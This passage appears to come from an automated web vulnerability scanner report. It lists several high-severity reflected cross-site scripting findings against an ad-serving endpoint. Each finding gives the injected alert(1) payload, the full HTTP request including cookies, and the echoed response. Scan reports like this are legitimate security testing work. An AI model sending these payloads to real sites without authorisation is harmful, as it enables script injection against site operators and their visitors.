GET /CNT/iview/244975246/direct;wi.300;hi.250/01/3612368145?click=http://r1.ace.advertising.com/click/site=0000782102/mnum=0000873573/cstr=49593843=_4ce92ab4,3612368145,782102^873573^1183^0,1_/xsxdata=$XSXDATA/bnum=49593843/optn=64?trg=&299a7"-alert(1)-"0ecfcb197b5=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8248
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:20:58 GMT

<html><head><title>FreePhone_Ornament_300x250_111510</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px
...[SNIP]...
22752_Instance =
{
click : "http://r1.ace.advertising.com/click/site=0000782102/mnum=0000873573/cstr=49593843=_4ce92ab4,3612368145,782102^873573^1183^0,1_/xsxdata=$XSXDATA/bnum=49593843/optn=64?trg=&299a7"-alert(1)-"0ecfcb197b5=1",
clickThruUrl: "http://clk.redcated/go/244975246/direct;wi.300;hi.250;ai.191166007;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique
...[SNIP]...

2.684. http://redcated/CNT/iview/244975246/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/244975246/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1922f"><script>alert(1)</script>b7ffbc22214 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CNT/iview/244975246/direct;wi.300;hi.250/01/3612368145?click=http://r1.ace.advertising.com/click/site=0000782102/mnum=0000873573/cstr=49593843=_4ce92ab4,3612368145,782102^873573^1183^0,1_/xsxdata=$XSXDATA/bnum=49593843/optn=64?trg=&1922f"><script>alert(1)</script>b7ffbc22214=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8319
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:20:57 GMT

<html><head><title>FreePhone_Ornament_300x250_111510</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px
...[SNIP]...
66007;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/click/site=0000782102/mnum=0000873573/cstr=49593843=_4ce92ab4,3612368145,782102^873573^1183^0,1_/xsxdata=$XSXDATA/bnum=49593843/optn=64?trg=&1922f"><script>alert(1)</script>b7ffbc22214=1\')(new Image).src=\'http://r1.ace.advertising.com/click/site=0000782102/mnum=0000873573/cstr=49593843=_4ce92ab4,3612368145,782102^873573^1183^0,1_/xsxdata=$XSXDATA/bnum=49593843/optn=64?trg=&1922f">
...[SNIP]...

2.685. http://redcated/CNT/iview/244975246/direct [wi.300;hi.250/01/3612368145?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/244975246/direct

Issue detail

The value of the wi.300;hi.250/01/3612368145?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12b0e'-alert(1)-'d5d9982288 was submitted in the wi.300;hi.250/01/3612368145?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/244975246/direct;wi.300;hi.250/01/3612368145?click=http://r1.ace.advertising.com/click/site=0000782102/mnum=0000873573/cstr=49593843=_4ce92ab4,3612368145,782102^873573^1183^0,1_/xsxdata=$XSXDATA/bnum=49593843/optn=64?trg=12b0e'-alert(1)-'d5d9982288 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8191
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:20:56 GMT

<html><head><title>Android_Future_300x250_110810</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;mar
...[SNIP]...
454411.replace(/!~!click!~!/g,'http://r1.ace.advertising.com/click/site=0000782102/mnum=0000873573/cstr=49593843=_4ce92ab4,3612368145,782102^873573^1183^0,1_/xsxdata=$XSXDATA/bnum=49593843/optn=64?trg=12b0e'-alert(1)-'d5d9982288');
}
else
{
_strContentCIN1288991454411 = '<a target="_blank" href="http://clk.atdmt.com/go/244975246/direct;wi.300;hi.250;ai.189705266;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/cli
...[SNIP]...

2.686. http://redcated/CNT/iview/244975246/direct [wi.300;hi.250/01/3612368145?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/244975246/direct

Issue detail

The value of the wi.300;hi.250/01/3612368145?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c04b"-alert(1)-"ad968f87b70 was submitted in the wi.300;hi.250/01/3612368145?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/244975246/direct;wi.300;hi.250/01/3612368145?click=http://r1.ace.advertising.com/click/site=0000782102/mnum=0000873573/cstr=49593843=_4ce92ab4,3612368145,782102^873573^1183^0,1_/xsxdata=$XSXDATA/bnum=49593843/optn=64?trg=2c04b"-alert(1)-"ad968f87b70 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8233
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:20:55 GMT

<html><head><title>FreePhone_Ornament_300x250_111510</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px
...[SNIP]...
122752_Instance =
{
click : "http://r1.ace.advertising.com/click/site=0000782102/mnum=0000873573/cstr=49593843=_4ce92ab4,3612368145,782102^873573^1183^0,1_/xsxdata=$XSXDATA/bnum=49593843/optn=64?trg=2c04b"-alert(1)-"ad968f87b70",
clickThruUrl: "http://clk.redcated/go/244975246/direct;wi.300;hi.250;ai.191166081;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_i
...[SNIP]...

2.687. http://redcated/CNT/iview/244975246/direct [wi.300;hi.250/01/3612368145?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/244975246/direct

Issue detail

The value of the wi.300;hi.250/01/3612368145?click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e90b5"><script>alert(1)</script>7a9a663c2a5 was submitted in the wi.300;hi.250/01/3612368145?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CNT/iview/244975246/direct;wi.300;hi.250/01/3612368145?click=http://r1.ace.advertising.com/click/site=0000782102/mnum=0000873573/cstr=49593843=_4ce92ab4,3612368145,782102^873573^1183^0,1_/xsxdata=$XSXDATA/bnum=49593843/optn=64?trg=e90b5"><script>alert(1)</script>7a9a663c2a5 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8272
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:20:54 GMT

<html><head><title>Android_Future_300x250_110810</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;mar
...[SNIP]...
705266;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/click/site=0000782102/mnum=0000873573/cstr=49593843=_4ce92ab4,3612368145,782102^873573^1183^0,1_/xsxdata=$XSXDATA/bnum=49593843/optn=64?trg=e90b5"><script>alert(1)</script>7a9a663c2a5\')(new Image).src=\'http://r1.ace.advertising.com/click/site=0000782102/mnum=0000873573/cstr=49593843=_4ce92ab4,3612368145,782102^873573^1183^0,1_/xsxdata=$XSXDATA/bnum=49593843/optn=64?trg=e90b5">
...[SNIP]...

2.688. http://redcated/CNT/iview/245130801/direct [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /CNT/iview/245130801/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e0e7'%3ba5b9a5bb5c0 was submitted in the REST URL parameter 4. This input was echoed as 2e0e7';a5b9a5bb5c0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/245130801/direct2e0e7'%3ba5b9a5bb5c0;wi.300;hi.250/01/7298457204586544128?click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*Qmw_99*YEw_115*BQz_3443735*mta_3247**13gzvnh8od021___3533310**0_3805*mDQ_114**_-862839443 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://media.adfrontiers.com/pq?t=f&s=486&ts=1290348505612&cm=191&ac=5&at=2&xvk=98038972.61537502&fd=t&tc=1&rr=t
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8081
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:18:26 GMT

<html><head><title>mdfNOKIA_Fall_300x250_100110</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;marg
...[SNIP]...
<param name="movie" value="HTTP://ec.atdmt.com/ds/CJCNTCINGCIN/mdfNOKIA_Fall_100110/mdfNOKIA_Fall_300x250_100110.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/245130801/direct2e0e7';a5b9a5bb5c0;wi.300;hi.250;ai.185129827;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/245130801/direct2e0e7';a5b9a5bb5c0;wi.300;hi.250;ai.185129827;ct.1/01" />
...[SNIP]...

2.689. http://redcated/CNT/iview/245130801/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/245130801/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 754c4'-alert(1)-'3a0cae620b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/245130801/direct;wi.300;hi.250/01/7298457204586544128?click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*Qmw_99*YEw_115*BQz_3443735*mta_3247**13gzvnh8od021___3533310**0_3805*mDQ_114**_-862839443&754c4'-alert(1)-'3a0cae620b=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://media.adfrontiers.com/pq?t=f&s=486&ts=1290348505612&cm=191&ac=5&at=2&xvk=98038972.61537502&fd=t&tc=1&rr=t
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8070
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:16:00 GMT

<html><head><title>mdfNOKIA_Fall_300x250_100110</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;marg
...[SNIP]...
= _strContentCIN1285876358257.replace(/!~!click!~!/g,'http://ad.trafficmp.com/a/click?_-611797114104433*_3107*Qmw_99*YEw_115*BQz_3443735*mta_3247**13gzvnh8od021___3533310**0_3805*mDQ_114**_-862839443&754c4'-alert(1)-'3a0cae620b=1');
}
else
{
_strContentCIN1285876358257 = '<a target="_blank" href="http://clk.atdmt.com/go/245130801/direct;wi.300;hi.250;ai.185129827;ct.1/01/" onclick="if(\'http://ad.trafficmp.com/a/click
...[SNIP]...

2.690. http://redcated/CNT/iview/245130801/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/245130801/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98484"><script>alert(1)</script>716523fb9bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CNT/iview/245130801/direct;wi.300;hi.250/01/7298457204586544128?click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*Qmw_99*YEw_115*BQz_3443735*mta_3247**13gzvnh8od021___3533310**0_3805*mDQ_114**_-862839443&98484"><script>alert(1)</script>716523fb9bf=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://media.adfrontiers.com/pq?t=f&s=486&ts=1290348505612&cm=191&ac=5&at=2&xvk=98038972.61537502&fd=t&tc=1&rr=t
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8149
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:15:02 GMT

<html><head><title>mdfNOKIA_Fall_300x250_100110</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;marg
...[SNIP]...
ect;wi.300;hi.250;ai.185129827;ct.1/01/" onclick="if(\'http://ad.trafficmp.com/a/click?_-611797114104433*_3107*Qmw_99*YEw_115*BQz_3443735*mta_3247**13gzvnh8od021___3533310**0_3805*mDQ_114**_-862839443&98484"><script>alert(1)</script>716523fb9bf=1\')(new Image).src=\'http://ad.trafficmp.com/a/click?_-611797114104433*_3107*Qmw_99*YEw_115*BQz_3443735*mta_3247**13gzvnh8od021___3533310**0_3805*mDQ_114**_-862839443&98484">
...[SNIP]...

2.691. http://redcated/CNT/iview/245130801/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/245130801/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2464b"-alert(1)-"66fe5d17e91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/245130801/direct;wi.300;hi.250/01/7298457204586544128?click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*Qmw_99*YEw_115*BQz_3443735*mta_3247**13gzvnh8od021___3533310**0_3805*mDQ_114**_-862839443&2464b"-alert(1)-"66fe5d17e91=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://media.adfrontiers.com/pq?t=f&s=486&ts=1290348505612&cm=191&ac=5&at=2&xvk=98038972.61537502&fd=t&tc=1&rr=t
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8074
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:15:31 GMT

<html><head><title>mdfNOKIA_Fall_300x250_100110</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;marg
...[SNIP]...
8257();
var _CIN1285876358257_Instance =
{
click : "http://ad.trafficmp.com/a/click?_-611797114104433*_3107*Qmw_99*YEw_115*BQz_3443735*mta_3247**13gzvnh8od021___3533310**0_3805*mDQ_114**_-862839443&2464b"-alert(1)-"66fe5d17e91=1",
clickThruUrl: "http://clk.redcated/go/245130801/direct;wi.300;hi.250;ai.185129827;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique
...[SNIP]...

2.692. http://redcated/CNT/iview/245130801/direct [wi.300;hi.250/01/7298457204586544128?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/245130801/direct

Issue detail

The value of the wi.300;hi.250/01/7298457204586544128?click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6220"><script>alert(1)</script>507ca3e20ea was submitted in the wi.300;hi.250/01/7298457204586544128?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CNT/iview/245130801/direct;wi.300;hi.250/01/7298457204586544128?click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*Qmw_99*YEw_115*BQz_3443735*mta_3247**13gzvnh8od021___3533310**0_3805*mDQ_114**_-862839443e6220"><script>alert(1)</script>507ca3e20ea HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://media.adfrontiers.com/pq?t=f&s=486&ts=1290348505612&cm=191&ac=5&at=2&xvk=98038972.61537502&fd=t&tc=1&rr=t
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8138
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:13:41 GMT

<html><head><title>mdfNOKIA_Fall_300x250_100110</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;marg
...[SNIP]...
rect;wi.300;hi.250;ai.185129827;ct.1/01/" onclick="if(\'http://ad.trafficmp.com/a/click?_-611797114104433*_3107*Qmw_99*YEw_115*BQz_3443735*mta_3247**13gzvnh8od021___3533310**0_3805*mDQ_114**_-862839443e6220"><script>alert(1)</script>507ca3e20ea\')(new Image).src=\'http://ad.trafficmp.com/a/click?_-611797114104433*_3107*Qmw_99*YEw_115*BQz_3443735*mta_3247**13gzvnh8od021___3533310**0_3805*mDQ_114**_-862839443e6220">
...[SNIP]...

2.693. http://redcated/CNT/iview/245130801/direct [wi.300;hi.250/01/7298457204586544128?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/245130801/direct

Issue detail

The value of the wi.300;hi.250/01/7298457204586544128?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a75e6'-alert(1)-'2ff87577ec was submitted in the wi.300;hi.250/01/7298457204586544128?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/245130801/direct;wi.300;hi.250/01/7298457204586544128?click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*Qmw_99*YEw_115*BQz_3443735*mta_3247**13gzvnh8od021___3533310**0_3805*mDQ_114**_-862839443a75e6'-alert(1)-'2ff87577ec HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://media.adfrontiers.com/pq?t=f&s=486&ts=1290348505612&cm=191&ac=5&at=2&xvk=98038972.61537502&fd=t&tc=1&rr=t
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8058
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:14:46 GMT

<html><head><title>mdfNOKIA_Fall_300x250_100110</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;marg
...[SNIP]...
7 = _strContentCIN1285876358257.replace(/!~!click!~!/g,'http://ad.trafficmp.com/a/click?_-611797114104433*_3107*Qmw_99*YEw_115*BQz_3443735*mta_3247**13gzvnh8od021___3533310**0_3805*mDQ_114**_-862839443a75e6'-alert(1)-'2ff87577ec');
}
else
{
_strContentCIN1285876358257 = '<a target="_blank" href="http://clk.atdmt.com/go/245130801/direct;wi.300;hi.250;ai.185129827;ct.1/01/" onclick="if(\'http://ad.trafficmp.com/a/click?_
...[SNIP]...

2.694. http://redcated/CNT/iview/245130801/direct [wi.300;hi.250/01/7298457204586544128?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/245130801/direct

Issue detail

The value of the wi.300;hi.250/01/7298457204586544128?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fd41"-alert(1)-"f885d948866 was submitted in the wi.300;hi.250/01/7298457204586544128?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/245130801/direct;wi.300;hi.250/01/7298457204586544128?click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*Qmw_99*YEw_115*BQz_3443735*mta_3247**13gzvnh8od021___3533310**0_3805*mDQ_114**_-8628394438fd41"-alert(1)-"f885d948866 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://media.adfrontiers.com/pq?t=f&s=486&ts=1290348505612&cm=191&ac=5&at=2&xvk=98038972.61537502&fd=t&tc=1&rr=t
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
